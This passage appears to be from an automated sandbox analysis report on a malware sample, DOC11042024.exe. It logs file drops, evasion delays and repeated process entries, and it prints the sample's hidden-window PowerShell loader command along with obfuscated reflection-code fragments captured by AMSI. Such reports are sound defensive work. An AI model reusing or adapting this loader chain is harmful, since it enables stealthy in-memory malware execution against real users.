          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2324502580.0000000002A48000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000002.00000002.2344258640.00000000081EC000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: tem.Core.pdb source: powershell.exe, 00000002.00000002.2344258640.00000000081EC000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: CallSite.Targetore.pdbic source: powershell.exe, 00000002.00000002.2344628886.00000000082EE000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: em.Core.pdb source: powershell.exe, 00000002.00000002.2344258640.00000000081EC000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5) source: powershell.exe, 00000002.00000002.2344258640.00000000081EC000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          Source: Yara match | File source: 00000002.00000002.2345390385.000000000A530000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Unbadgering $ravnemrketlantpagten $Yemenittiskes), (Radikalest88 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Blomstringstiderne = [AppDomain]::CurrentD
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Antiexpansionist)), $ravnemrkefgifterne).DefineDynamicModule($antologiens, $false).DefineType($helsider, $Dewanee, [System.MulticastDe
          Source: C:\Users\user\Desktop\DOC11042024.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Unproded=Get-Content -raw 'C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213\Isbjergs.Krs';$Acockbill=$Unproded.SubString(73125,3);.$Acockbill($Unproded) "
          Source: C:\Users\user\Desktop\DOC11042024.exe | Code function: 0_2_0040620C GetModuleHandleA,LoadLibraryA,GetProcAddress
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created (dropped file): C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213\DOC11042024.exe
          Source: C:\Users\user\Desktop\DOC11042024.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\bestialitet.ini

          Hooking and other Techniques for Hiding and Protection

          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Users\user\Desktop\DOC11042024.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 600000
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599890
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599781
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599670
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599562
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599452
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599344
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599234
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599124
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599016
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598906
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598797
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598687
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598578
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598469
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598344
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598234
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598125
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598015
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597906
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597797
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597687
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597578
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597467
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597359
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597250
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597141
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597016
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596891
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596781
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596671
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596562
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596453
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596344
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596234
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596125
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596016
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595891
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595766
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595656
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595543
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595437
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595328
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595219
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595109
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595000
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594890
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594781
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594672
          Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594562
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6766
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2921
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3040 Thread sleep time: -4611686018427385s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168 Thread sleep count: 35 > 30
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168 Thread sleep time: -32281802128991695s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168 Thread sleep time: -600000s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 2740 Thread sleep count: 1397 > 30
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168 Thread sleep time: -599890s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 2740 Thread sleep count: 8454 > 30
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168 Thread sleep time: -599781s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168 Thread sleep time: -599670s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168 Thread sleep time: -599562s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168 Thread sleep time: -599452s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168 Thread sleep time: -599344s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168 Thread sleep time: -599234s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168 Thread sleep time: -599124s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168 Thread sleep time: -599016s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168 Thread sleep time: -598906s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168 Thread sleep time: -598797s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168 Thread sleep time: -598687s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168 Thread sleep time: -598578s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168 Thread sleep time: -598469s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168 Thread sleep time: -598344s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168 Thread sleep time: -598234s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168 Thread sleep time: -598125s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168 Thread sleep time: -598015s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168 Thread sleep time: -597906s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168 Thread sleep time: -597797s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168 Thread sleep time: -597687s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168 Thread sleep time: -597578s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168 Thread sleep time: -597467s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168 Thread sleep time: -597359s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168 Thread sleep time: -597250s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168 Thread sleep time: -597141s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168 Thread sleep time: -597016s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168 Thread sleep time: -596891s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168 Thread sleep time: -596781s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168 Thread sleep time: -596671s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168 Thread sleep time: -596562s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168 Thread sleep time: -596453s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168 Thread sleep time: -596344s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168 Thread sleep time: -596234s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168 Thread sleep time: -596125s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168 Thread sleep time: -596016s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168 Thread sleep time: -595891s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168 Thread sleep time: -595766s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168 Thread sleep time: -595656s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168 Thread sleep time: -595543s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168 Thread sleep time: -595437s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168 Thread sleep time: -595328s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168 Thread sleep time: -595219s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168 Thread sleep time: -595109s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168 Thread sleep time: -595000s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168 Thread sleep time: -594890s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168 Thread sleep time: -594781s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168 Thread sleep time: -594672s >= -30000s
